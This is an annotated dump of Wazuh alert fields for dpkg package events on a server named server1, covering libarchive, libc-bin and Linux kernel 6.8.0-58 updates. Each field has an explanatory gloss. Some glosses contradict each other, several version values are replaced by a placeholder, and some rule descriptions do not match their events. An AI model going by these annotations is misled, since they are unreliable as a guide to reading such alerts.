full_log: 2025-04-24 22:23:01 status half-configured libarchive13t64:amd64 3.7.2-2ubuntu0.4 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured dpkg state transition recorded in dpkg.log, not the result of a query. 'half-configured' is a normal transient state while a package's maintainer scripts run; it only matters if no 'installed' line follows for the same package and version.
data.package: libarchive13t64 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 Package architecture from dpkg ('all' for architecture-independent packages). Needed when matching the package to an advisory or patch.
data.version: 3.7.2-2ubuntu0.4 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533382.20231 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:01 status installed libarchive13t64:amd64 3.7.2-2ubuntu0.4 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed dpkg state transition recorded in dpkg.log. 'installed' is the terminal state that closes out the earlier 'half-configured' line for this package and version.
data.package: libarchive13t64 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 Package architecture from dpkg ('all' for architecture-independent packages). Needed when matching the package to an advisory or patch.
data.version: 3.7.2-2ubuntu0.4 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533382.20716 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:01 status half-configured libc-bin:amd64 2.39-0ubuntu8.4 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured dpkg state transition recorded in dpkg.log, not the result of a query. 'half-configured' is a normal transient state while a package's maintainer scripts run; it only matters if no 'installed' line follows for the same package and version.
data.package: libc-bin Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 Package architecture from dpkg ('all' for architecture-independent packages). Needed when matching the package to an advisory or patch.
data.version: 2.39-0ubuntu8.4 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533382.21199 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:01 status installed libc-bin:amd64 2.39-0ubuntu8.4 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed dpkg state transition recorded in dpkg.log. 'installed' is the terminal state that closes out the earlier 'half-configured' line for this package and version.
data.package: libc-bin Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 Package architecture from dpkg ('all' for architecture-independent packages). Needed when matching the package to an advisory or patch.
data.version: 2.39-0ubuntu8.4 Package version from the dpkg log line. Pair with data.package to see exactly what landed on the box.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 Running count of how many times this rule has fired on this manager. A fast-climbing value means repetitive behaviour.
rule.mail: False True if the rule is flagged to send an email alert. Rarely used now, but still a hint that the rule author considered it high value.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] GPG13 (UK Good Practice Guide 13, protective monitoring) control mapping, the same idea as the PCI DSS and NIST fields.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Wazuh agent ID. 000 is reserved for the manager itself, so this alert comes from the manager's own local logs, not from an enrolled agent.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533386.22728 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:06 install linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-modules-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533388.23170 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:06 install linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-image-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533388.23610 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:07 install linux-modules-extra-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-modules-extra-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533392.24064 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:10 status half-configured linux-generic:amd64 6.8.0-57.59 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-57.59 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533392.24549 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:11 status half-configured linux-image-generic:amd64 6.8.0-57.59 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-image-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-57.59 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533392.25046 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:11 install linux-headers-6.8.0-58:all 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-headers-6.8.0-58 Package name involved (apt/yum). Good for vuln tracking.
data.arch: all System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533400.25468 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:19 install linux-headers-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-headers-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533404.25910 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:22 status half-configured linux-headers-generic:amd64 6.8.0-57.59 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-headers-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-57.59 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533404.26411 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:22 install linux-tools-6.8.0-58:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533404.26833 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:23 install linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533404.27271 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:23 status half-configured linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-modules-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533410.27790 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:30 status installed linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-modules-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533410.28295 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:30 status half-configured linux-tools-6.8.0-58:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533410.28794 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:30 status installed linux-tools-6.8.0-58:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533410.29279 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:30 status half-configured linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
